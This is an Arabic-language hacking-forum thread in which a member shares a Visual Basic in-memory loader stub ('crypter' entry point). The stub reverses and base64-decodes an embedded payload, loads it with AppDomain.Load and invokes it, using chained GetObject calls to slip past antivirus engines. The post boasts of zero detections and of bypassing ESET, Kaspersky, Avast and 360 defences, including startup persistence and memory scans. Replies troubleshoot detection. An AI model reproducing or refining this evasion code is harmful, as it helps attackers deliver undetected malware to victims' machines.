{فكرة جديدة} نقطة أدخال نظيفة بنتيجة (0/35) وتخطي جميع الدفاعات الأستباقية {عودة بيس 64}

تم تحميل الصفحة في 1,3441310 ثانية
{فكرة جديدة} نقطة أدخال نظيفة بنتيجة (0/35) وتخطي جميع الدفاعات الأستباقية {عودة بيس 64}

Lua.53

Dz Developer
rankrank
إنضم
6 ديسمبر 2017
المشاركات
221
الإعجابات
259
النقاط
63
الإقامة
Alger 19
والله يا اخي ما اضفت او نقصت ولا حرف نسخ لصق
واضفت قيم السيرفر base64 متل ما انت عملت

هي صورة الكود


.
.
.
هي صورة الاعدادات

اخي التشفيرة كشفت من 7 حمايات لانك مسمي المشروع svchots طبعا الحمايات عندها الهاش الخاص بالملف
الاصلي svchots في قاعدة بياناتها فتقارنه بملفك فان كان الهاش غير مطابق يعني انه خضع للتعديل و بذلك تحسبه ملفا ضار
حتى لو كان الملف نظيف
 
إنضم
24 سبتمبر 2013
المشاركات
405
الإعجابات
321
النقاط
63
السلام عليكم ورحمة الله وبركاته

رجعتلكم بموضوع جديد وفكرة جديدة وأن شالله تعجبكم

قمت بعمل لكم نقطة أدخال بأفكار جديدة ومن خلالها تستطيع تخطي الدفاعات الأستباقية
حتى مع قيم بيس 64 يعني لو أستخدمة قيم بيس 64 معها تعطيك نتيجة 0/35
وغير ذلك أنها تقوم بتخطي الدفاع الأستباقي للكثير من الحمايات
الحمايات التي قمت بالتجربة عليها
Eset Node32 + KasperSky + 360 Total + Avast
تم تخطي الدفاعات الأستباقية بنجاح حتى مع التثبيت في الستارت اب
وأيضا تم تخطي فحص الذاكرة في حماية النود بنجاح وبدون أي مشاكل

الآن خلينا نشوف شو فكرة نقطة الأدخال :

قمت بالأعتماد على هذا الأمر System.Data.DataSet.GetDataSetSchema

بهدف عمل تشتيت للحمايات عند عملية أستدعاء الـ(Load)

ثم قمت بالأعتماد أيضا على دالة (GetObject)
لأستدعاء الأمر الثاني وهو المسؤول عن أستدعاء اللود وتحميل السيرفر في الذاكرة
ثم قمت بعمل أكثر من أستدعاء بالأعتماد على دالة (GetObject)
و قمت بأستدعاء آخر متغير وهو المسؤول عن أستدعاء الأمر الذي قبله يعني تقدر تقول القصة هي أستدعائات متسلسلة
طبعاّ جميع ما فعلناه الآن هو خارج نطاق (Sub Main)
الآن نرجع لـSub Main لانه لم نضع شيء بها وهكذا من المستحيل أن يعمل السيرفر الخاص بنا
نروح لـ (Sub Main) نقوم بعمل متغير جديد مسؤول عن أستدعاء المتغير H9 المسؤول عن أستدعاء ما قبله
الفكرة بسيطة وقوية من خلالها أستطعنا الوصول الى نتيجة كلين حتى مع قيم بيس 64 المكشوفة من الكثير من الحمايات
دون التعديل على القيم بأي شكل من الأشكال فقط قمت بعمل عكس للقيم الهدف منه تخطي حماية الأفيرا لأنه تقوم بكشف الواجهة الشكلية لقيم بيس 64 وبدون عكس قيم يكون فقط مكشوف من حماية واحدة وهي الأفيرا يعني لا بأس

نتيجة الفحص :

Results | Metadefender.com


فيديو تخطي الدفاع الأستباقي وفحص الذاكرة في حماية (Node32) آحر تحديث بأستخدام نقطة الأدخال هذه مع قيم بيس 64


يمكن بعض الناس ما فهمت كلامي الي قلته لأنه الفكرة شوي معقدة
وحتى تقدر تفهم الفكرة أكثر شوف الكود بنفسك وأذا تحب عدل عليه براحتك

كود Visual Basic
Module Module1
    Dim A1 = System.AppDomain.CurrentDomain.Load(Convert.FromBase64String(StrReverse("")))
    Dim B2 = System.Data.DataSet.GetDataSetSchema(A1.EntryPoint.Invoke(B4 + B5 + B6 + B7 + B8 + B9 + B0, B3))
    Dim H1 = GetObject(B2)
    Dim H2 = GetObject(H1)
    Dim H3 = GetObject(H2)
    Dim H4 = GetObject(H3)
    Dim H5 = GetObject(H4)
    Dim H6 = GetObject(H5)
    Dim H7 = GetObject(H6)
    Dim H8 = GetObject(H7)
    Dim H9 = GetObject(H8)
    Sub Main()
'Coded By Salem Mahmoud
        Dim H0 = H9
    End Sub
    Public B3 = New Object(-+1) {}
    Public B4 = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||".Replace("|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||", "N")
    Public B5 = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||".Replace("|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||", "o")
    Public B6 = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||".Replace("|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||", "t")
    Public B7 = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||".Replace("|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||", "h")
    Public B8 = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||".Replace("|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||", "i")
    Public B9 = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||".Replace("|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||", "n")
    Public B0 = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||".Replace("|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||", "g")
End Module


في أمان الله


الفيديو غير متوفر للاسف كان ودي اجرب التشفيره اذا ممكن اعادة رفع الفيديو
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل